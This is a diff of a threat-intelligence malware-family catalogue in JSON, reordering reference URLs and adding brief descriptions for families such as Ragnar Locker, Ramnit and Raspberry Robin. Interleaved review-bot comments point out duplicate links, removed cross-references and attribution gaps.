+ "https://www.capcom.co.jp/ir/english/news/pdf/e210413.pdf",
+ "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel",
+ "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom",
+ "https://www.acronis.com/en-sg/articles/ragnar-locker/",
+ "https://seguranca-informatica.pt/ragnar-locker-malware-analysis/",
+ "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
+ "https://www.bleepingcomputer.com/news/security/capcom-hit-by-ragnar-locker-ransomware-1tb-allegedly-stolen/",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
+ "https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
"https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/analysis-and-protections-for-ragnarlocker-ransomware.html",
+ "https://twitter.com/AltShiftPrtScn/status/1403707430765273095",
+ "https://blog.reversing.xyz/docs/posts/unpacking_ragnarlocker_via_emulation/",
+ "https://id-ransomware.blogspot.com/2020/02/ragnarlocker-ransomware.html",
+ "https://krebsonsecurity.com/2020/11/ransomware-group-turns-to-facebook-ads/",
+ "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1",
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://www.bleepingcomputer.com/news/security/japanese-game-dev-capcom-hit-by-cyberattack-business-impacted/",
+ "https://www.waterisac.org/system/files/articles/FLASH-MU-000140-MW.pdf",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ragnarlocker-ransomware-threatens-to-release-confidential-information",
"https://blog.blazeinfosec.com/dissecting-ragnar-locker-the-case-of-edp/",
"https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://www.ic3.gov/Media/News/2022/220307.pdf",
- "https://krebsonsecurity.com/2020/11/ransomware-group-turns-to-facebook-ads/",
- "https://www.theregister.com/2022/03/09/fbi_says_ragnar_locker_ransomware/",
- "https://www.acronis.com/en-sg/articles/ragnar-locker/",
- "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
- "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom",
- "https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker",
+ "https://news.sophos.com/en-us/2021/02/03/mtr-casebook-uncovering-a-backdoor-implant-in-a-solarwinds-orion-server/",
+ "http://reversing.fun/reversing/2021/04/15/unpacking_ragnarlocker_via_emulation.html",
"http://reversing.fun/posts/2021/04/15/unpacking_ragnarlocker_via_emulation.html",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
+ "https://securelist.com/modern-ransomware-groups-ttps/106824/",
+ "https://blog.reversing.xyz/reversing/2021/04/15/unpacking_ragnarlocker_via_emulation.html",
+ "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf",
+ "https://cyware.com/news/ragnar-locker-breached-52-organizations-and-counting-fbi-warns-0588d220/",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
"https://www.bleepingcomputer.com/news/security/ragnarlocker-ransomware-hits-edp-energy-giant-asks-for-10m/",
- "https://www.bleepingcomputer.com/news/security/capcom-hit-by-ragnar-locker-ransomware-1tb-allegedly-stolen/",
- "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
- "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
+ "https://www.ic3.gov/Media/News/2022/220307.pdf",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
+ "https://www.theregister.com/2022/03/09/fbi_says_ragnar_locker_ransomware/",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://twitter.com/AltShiftPrtScn/status/1403707430765273095",
- "https://www.capcom.co.jp/ir/english/news/pdf/e210413.pdf",
- "https://blog.reversing.xyz/docs/posts/unpacking_ragnarlocker_via_emulation/",
- "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel",
- "https://www.bleepingcomputer.com/news/security/japanese-game-dev-capcom-hit-by-cyberattack-business-impacted/"
+ "https://www.zdnet.com/article/capcom-quietly-discloses-cyberattack-impacting-email-file-servers/",
+ "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/",
+ "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
+ "https://blog.cyble.com/2022/01/20/deep-dive-into-ragnar-locker-ransomware-gang/",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/analysis-and-protections-for-ragnarlocker-ransomware.html",
+ "https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker",
+ "https://securelist.com/targeted-ransomware-encrypting-data/99255/"
],
"synonyms": [],
"type": []
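Review bot: after the reorder the Ragnar Locker list still carries the same write-up under four URLs, `blog.reversing.xyz/docs/posts/unpacking_ragnarlocker_via_emulation/`, `reversing.fun/reversing/2021/04/15/...`, `reversing.fun/posts/2021/04/15/...` and `blog.reversing.xyz/reversing/2021/04/15/...`, plus the CrowdStrike double-trouble post both with and without a trailing slash. Since the patch already touches every one of these lines, collapse each to one canonical URL now. The one genuine addition, the noticeofpleadings.com Microsoft Cobalt Strike complaint, is a court filing rather than a malware analysis; confirm it actually discusses Ragnar Locker before keeping it on this cluster.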
@@ -37958,13 +40027,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarok",
- "https://news.sophos.com/en-us/2020/05/21/asnarok2/",
"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
"https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
- "https://www.bleepingcomputer.com/news/security/ragnarok-ransomware-releases-master-decryptor-after-shutdown/",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
"https://github.com/k-vitali/Malware-Misc-RE/blob/master/2020-01-26-ragnarok-cfg-vk.notes.raw",
"https://www.bleepingcomputer.com/news/security/ragnarok-ransomware-targets-citrix-adc-disables-windows-defender/",
+ "https://www.bleepingcomputer.com/news/security/ragnarok-ransomware-releases-master-decryptor-after-shutdown/",
+ "https://news.sophos.com/en-us/2020/05/21/asnarok2/",
"https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/"
],
"synonyms": [],
@@ -37978,27 +40047,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.raindrop",
- "https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf",
- "https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html",
- "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
"https://www.youtube.com/watch?v=GfbxHy6xnbA",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware",
- "https://www.mandiant.com/resources/unc2452-merged-into-apt29",
"https://file2.api.drift.com/download/drift-prod-file-uploads/417f%2F417f74ae8ddd24aa7c2b43a23093983f/Supply%20Chain%20Attacks_%20Cyber%20Criminals%20Target%20the%20Weakest%20Link.pdf",
+ "https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf",
+ "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
+ "https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html",
+ "https://www.mandiant.com/resources/unc2452-merged-into-apt29",
"https://www.sans.org/webcasts/contrarian-view-solarwinds-119515"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "6c562458-7970-4d61-aded-1fe4a9002404",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "309f9be7-8824-4452-90b3-cef81fd10099",
"value": "Raindrop"
},
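Review bot: besides the reorder, this hunk silently deletes the `related` block that linked Raindrop to `6c562458-7970-4d61-aded-1fe4a9002404` with a `similar` relation at almost-certain likelihood. Nothing in the patch says why. If the target cluster was removed, or the relation is now generated elsewhere, the commit message should say so; otherwise this is a regression that drops a cross-reference consumers may rely on. Either restore the block or document the removal.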
@@ -38020,10 +40080,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rambo",
- "https://github.com/m0n0ph1/APT_CyberCriminal_Campagin_Collections-1/blob/master/2017/2017.02.15.deep-dive-dragonok-rambo-backdoor/Deep%20Dive%20on%20the%20DragonOK%20Rambo%20Backdoor%20_%20Morphick%20Cyber%20Security.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-overbrook",
"https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2017-02-15-the-rambo-backdoor.md",
- "https://securitykitten.github.io/2017/02/15/the-rambo-backdoor.html"
+ "https://github.com/m0n0ph1/APT_CyberCriminal_Campagin_Collections-1/blob/master/2017/2017.02.15.deep-dive-dragonok-rambo-backdoor/Deep%20Dive%20on%20the%20DragonOK%20Rambo%20Backdoor%20_%20Morphick%20Cyber%20Security.pdf",
+ "https://securitykitten.github.io/2017/02/15/the-rambo-backdoor.html",
+ "https://www.secureworks.com/research/threat-profiles/bronze-overbrook"
],
"synonyms": [
"brebsd"
@@ -38046,34 +40106,34 @@
"value": "Ramdo"
},
{
- "description": "",
+ "description": "According to Check Point, Ramnit is primarily a banking trojan, meaning that its purpose is to steal login credentials for online banking, which cybercriminals can sell or use in future attacks. For this reason, Ramnit primarily targets individuals rather than focusing on particular industries.\r\n\r\nRamnit campaigns have been observed to target organizations in particular industries. For example, a 2019 campaign targeted financial organizations in the United Kingdom, Italy, and Canada.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ramnit",
- "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/",
- "https://securityintelligence.com/posts/ramnit-banking-trojan-stealing-card-data/",
- "https://www.mandiant.com/resources/pe-file-infecting-malware-ot",
- "https://securelist.com/financial-cyberthreats-in-2020/101638/",
- "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf",
- "http://contagiodump.blogspot.com/2012/01/blackhole-ramnit-samples-and-analysis.html",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/",
- "https://malwarebreakdown.com/2017/08/23/the-seamless-campaign-isnt-losing-any-steam/",
- "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89",
- "https://muha2xmad.github.io/unpacking/ramnit/",
- "https://blogs.akamai.com/2019/02/ramnit-in-the-uk.html",
- "http://www.vkremez.com/2018/02/deeper-dive-into-ramnit-banker-vnc-ifsb.html",
- "https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest",
- "https://www.youtube.com/watch?v=l6ZunH6YG0A",
"https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf",
- "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
- "https://research.checkpoint.com/ramnits-network-proxy-servers/",
- "https://artik.blue/malware4",
+ "https://www.youtube.com/watch?v=l6ZunH6YG0A",
"https://www.researchgate.net/profile/Lorenzo-De-Carli/publication/320250366_Botnet_protocol_inference_in_the_presence_of_encrypted_traffic/links/5fa9608792851cc286a08592/Botnet-protocol-inference-in-the-presence-of-encrypted-traffic.pdf?origin=publication_detail",
+ "http://contagiodump.blogspot.com/2012/01/blackhole-ramnit-samples-and-analysis.html",
+ "https://artik.blue/malware4",
+ "https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/",
+ "https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest",
+ "https://redcanary.com/resources/webinars/deep-dive-process-injection/",
+ "https://muha2xmad.github.io/unpacking/ramnit/",
+ "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89",
+ "https://research.checkpoint.com/ramnits-network-proxy-servers/",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
+ "https://securityintelligence.com/posts/ramnit-banking-trojan-stealing-card-data/",
+ "https://malwarebreakdown.com/2017/08/23/the-seamless-campaign-isnt-losing-any-steam/",
"http://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
"https://www.youtube.com/watch?v=N4f2e8Mygag",
- "http://www.secureworks.com/research/threat-profiles/gold-fairfax",
- "https://redcanary.com/resources/webinars/deep-dive-process-injection/"
+ "https://www.mandiant.com/resources/pe-file-infecting-malware-ot",
+ "http://www.vkremez.com/2018/02/deeper-dive-into-ramnit-banker-vnc-ifsb.html",
+ "https://blogs.akamai.com/2019/02/ramnit-in-the-uk.html",
+ "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/",
+ "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf",
+ "https://securelist.com/financial-cyberthreats-in-2020/101638/",
+ "http://www.secureworks.com/research/threat-profiles/gold-fairfax"
],
"synonyms": [
"Nimnul"
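Review bot: the new Ramnit description contradicts itself: the first paragraph says Ramnit "primarily targets individuals rather than focusing on particular industries", the second says campaigns "have been observed to target organizations in particular industries" and gives a 2019 example. The two claims are reconcilable (a banking trojan aimed at individuals whose distribution campaigns are sometimes sector-specific), but the text should say so, for instance by opening the second paragraph with "That said,", and it should state whose reporting the 2019 UK/Italy/Canada campaign comes from, since only the first paragraph is attributed ("According to Check Point").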
@@ -38088,12 +40148,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ramsay",
- "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf",
- "https://www.antiy.cn/research/notice&report/research_report/20200522.html",
- "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
"https://www.youtube.com/watch?v=SKIu4LqMrns",
"https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html",
- "https://www.sentinelone.com/blog/why-on-device-detection-matters-new-ramsay-trojan-targets-air-gapped-networks/"
+ "https://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf",
+ "https://www.sentinelone.com/blog/why-on-device-detection-matters-new-ramsay-trojan-targets-air-gapped-networks/",
+ "https://www.antiy.cn/research/notice&report/research_report/20200522.html",
+ "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/"
],
"synonyms": [],
"type": []
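Review bot: the only addition here, `https://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html`, reads from its path like one instalment of a general persistence tutorial series rather than a Ramsay analysis. Confirm the post actually discusses Ramsay (for example as a real-world user of the technique it teaches) before attaching it to this cluster; otherwise it belongs with a technique reference, not a malware family.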
@@ -38106,12 +40167,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ranbyus",
+ "https://bin.re/blog/the-dga-of-ranbyus/",
+ "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
+ "https://www.welivesecurity.com/2012/06/05/smartcard-vulnerabilities-in-modern-banking-malware/",
"http://www.xylibox.com/2013/01/trojanwin32spyranbyus.html",
"https://www.welivesecurity.com/2012/12/19/win32spy-ranbyus-modifying-java-code-in-rbs/",
- "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
- "https://www.johannesbader.ch/2015/05/the-dga-of-ranbyus/",
- "https://www.welivesecurity.com/2012/06/05/smartcard-vulnerabilities-in-modern-banking-malware/",
- "https://www.group-ib.ru/brochures/Group-IB-Corkow-Report-EN.pdf"
+ "https://www.group-ib.ru/brochures/Group-IB-Corkow-Report-EN.pdf",
+ "https://www.johannesbader.ch/2015/05/the-dga-of-ranbyus/"
],
"synonyms": [],
"type": []
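Review bot: the added `https://bin.re/blog/the-dga-of-ranbyus/` and the retained `https://www.johannesbader.ch/2015/05/the-dga-of-ranbyus/` are the same post on two domains (identical title slug). Keep one canonical URL, preferably whichever currently resolves, rather than listing both.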
@@ -38163,34 +40225,34 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomexx",
- "https://www.bleepingcomputer.com/news/security/brazils-court-system-under-massive-ransomexx-ransomware-attack/",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx",
- "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
- "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3",
- "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html",
- "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/",
- "https://github.com/Bleeping/Ransom.exx",
- "https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/",
"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://github.com/Bleeping/Ransom.exx",
"https://www.bleepingcomputer.com/news/security/new-ransom-x-ransomware-used-in-texas-txdot-cyberattack/",
+ "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4",
"https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/",
"https://www.bleepingcomputer.com/news/security/ransomware-attack-hits-italys-lazio-region-affects-covid-19-site/",
- "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
- "https://www.ic3.gov/Media/News/2021/211101.pdf",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://medium.com/proferosec-osm/ransomexx-fixing-corrupted-ransom-8e379bcaf701",
+ "https://www.youtube.com/watch?v=qxPXxWMI2i4",
+ "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3",
"https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
- "https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
+ "https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/",
"https://id-ransomware.blogspot.com/2020/06/ransomexx-ransomware.html",
- "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/",
+ "https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
"https://www.trendmicro.com/en_us/research/21/a/expanding-range-and-improving-speed-a-ransomexx-approach.html",
"https://www.bleepingcomputer.com/news/security/ecuadors-state-run-cnt-telco-hit-by-ransomexx-ransomware/",
"https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
- "https://medium.com/proferosec-osm/ransomexx-fixing-corrupted-ransom-8e379bcaf701",
+ "https://www.ic3.gov/Media/News/2021/211101.pdf",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/",
+ "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4",
- "https://www.youtube.com/watch?v=qxPXxWMI2i4"
+ "https://www.bleepingcomputer.com/news/security/brazils-court-system-under-massive-ransomexx-ransomware-attack/",
+ "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx"
],
"synonyms": [
"Defray777",
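Review bot: this RansomEXX refs hunk is a pure reorder with no net change (every `-` URL reappears as a `+` line), which hides real edits behind noise; have the generator emit refs in a stable order, e.g. sorted, so only genuine additions and removals show up in diffs. While here, the list still carries the same CrowdStrike post twice, once with `?utm_campaign=blog&utm_medium=soc...` and once without, plus both the live and the web.archive.org copies of the Group-IB PDF; stripping tracking parameters before deduplication would collapse the first pair.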
@@ -38231,15 +40293,15 @@
"value": "SNC"
},
{
- "description": "",
+ "description": "InfinityGroup notes that Rapid Ransomware, unlike regular Ransomware, stays active on the computer after initially encrypting the systems and also encrypts any new files that are created. It does this by creating auto-runs that are designed to launch the ransomware and display the ransom note every time the infected system is started.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_ransom",
- "https://twitter.com/malwrhunterteam/status/977275481765613569",
- "https://twitter.com/malwrhunterteam/status/997748495888076800",
"https://www.youtube.com/watch?v=LUxOcpIRxmg",
"https://exchange.xforce.ibmcloud.com/collection/GuessWho-Ransomware-A-Variant-of-Rapid-Ransomware-ef226b9792fa4c1e34fa4c587db04145",
- "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do"
+ "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do",
+ "https://twitter.com/malwrhunterteam/status/977275481765613569",
+ "https://twitter.com/malwrhunterteam/status/997748495888076800"
],
"synonyms": [],
"type": []
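Review bot: the new Rapid Ransom description opens with "InfinityGroup notes that ..." but none of the six refs in this hunk points at an InfinityGroup source, so the attribution is unverifiable from the cluster itself; either add the source URL to `refs` or drop the attribution and state the behaviour directly. The two Twitter refs are only moved, not changed, so that part of the hunk is ordering churn.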
@@ -38248,7 +40310,7 @@
"value": "Rapid Ransom"
},
{
- "description": "",
+ "description": "A spy trojan is a type of malware that has the capability to gather information from the infected system without consent from the user. This information is then sent to a remote attacker.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_stealer",
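Review bot: the description added for Rapid Stealer is a generic definition of a spy trojan and never names the family or what it collects; acceptable as a placeholder, but a sentence specific to this stealer would make the cluster useful when analysts search descriptions.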
@@ -38265,8 +40327,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rarog",
- "https://unit42.paloaltonetworks.com/unit42-smoking-rarog-mining-trojan/",
- "https://tracker.fumik0.com/malware/Rarog"
+ "https://tracker.fumik0.com/malware/Rarog",
+ "https://unit42.paloaltonetworks.com/unit42-smoking-rarog-mining-trojan/"
],
"synonyms": [],
"type": []
@@ -38275,7 +40337,7 @@
"value": "Rarog"
},
{
- "description": "",
+ "description": "This ransomware encrypts all user’s data on the PC (photos, documents, excel tables, music, videos, etc), adds its specific extension to every file, and creates the HOW_TO_DECYPHER_FILES.txt files in every folder which contains encrypted files.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rarstar",
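Review bot: the Rarstar description contains a typographic apostrophe in "user’s" and lowercases "excel"; more importantly, confirm that `HOW_TO_DECYPHER_FILES.txt` is the literal ransom-note filename rather than a misspelling of "DECIPHER", since analysts match these strings against artefacts and a one-letter difference breaks the match.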
@@ -38292,12 +40354,20 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.raspberry_robin",
- "https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/",
- "https://redcanary.com/blog/raspberry-robin/",
- "https://blogs.cisco.com/security/raspberry-robin-highly-evasive-worm-spreads-over-external-disks",
+ "https://research.checkpoint.com/2023/raspberry-robin-anti-evasion-how-to-exploit-analysis/",
+ "https://unit42.paloaltonetworks.com/unsigned-dlls/",
+ "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/",
+ "https://research.checkpoint.com/2023/raspberry-robin-anti-evasion-how-to-exploit-analysis",
+ "https://www.securityjoes.com/post/raspberry-robin-detected-itw-targeting-insurance-financial-institutes-in-europe",
+ "https://www.trendmicro.com/fr_fr/research/22/l/raspberry-robin-malware-targets-telecom-governments.html",
"https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/",
+ "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/",
+ "https://redcanary.com/blog/raspberry-robin/",
+ "https://www.bleepingcomputer.com/news/security/microsoft-links-raspberry-robin-worm-to-clop-ransomware-attacks/",
"https://www.cybereason.com/blog/threat-alert-raspberry-robin-worm-abuses-windows-installer-and-qnap-devices",
- "https://thehackernews.com/2022/07/microsoft-links-raspberry-robin-usb.html?_m=3n%2e009a%2e2800%2ejp0ao0cjb8%2e1shm"
+ "https://thehackernews.com/2022/07/microsoft-links-raspberry-robin-usb.html?_m=3n%2e009a%2e2800%2ejp0ao0cjb8%2e1shm",
+ "https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/",
+ "https://blogs.cisco.com/security/raspberry-robin-highly-evasive-worm-spreads-over-external-disks"
],
"synonyms": [
"LINK_MSIEXEC",
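Review bot: two of the added Raspberry Robin refs are the same Check Point article, `https://research.checkpoint.com/2023/raspberry-robin-anti-evasion-how-to-exploit-analysis/` and the same URL without the trailing slash; normalise trailing slashes before deduplicating and keep one. The thehackernews.com entry also still carries a `?_m=...` tracking parameter that should be stripped.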
@@ -38306,15 +40376,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "70dc3e92-9b3b-4fc1-abd2-d98985d83225",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "34b3a45b-e522-4342-91c8-b6aad9817f99",
"value": "Raspberry Robin"
},
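Review bot: this hunk deletes the whole `related` array for Raspberry Robin (the "similar" link to dest-uuid 70dc3e92-9b3b-4fc1-abd2-d98985d83225) and nothing in the patch re-expresses that relationship, so consumers lose the cross-cluster mapping. The same removal recurs below for Ratankba, RDAT, Reaver and RedLeaves. If relations are now generated elsewhere, state that in the commit message; otherwise keep the arrays.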
@@ -38323,31 +40384,22 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ratankba",
+ "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf",
+ "http://baesystemsai.blogspot.de/2016/05/cyber-heist-attribution.html",
+ "https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware-0",
+ "https://content.fireeye.com/apt/rpt-apt38",
+ "https://www.bleepingcomputer.com/news/security/polish-banks-infected-with-malware-hosted-on-their-own-governments-site/",
+ "https://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html",
"https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
"https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware",
- "http://baesystemsai.blogspot.de/2016/05/cyber-heist-attribution.html",
- "https://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html",
"https://twitter.com/PhysicalDrive0/status/828915536268492800",
- "https://www.bleepingcomputer.com/news/security/polish-banks-infected-with-malware-hosted-on-their-own-governments-site/",
- "https://www.secureworks.com/research/threat-profiles/nickel-gladstone",
- "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf",
- "https://content.fireeye.com/apt/rpt-apt38",
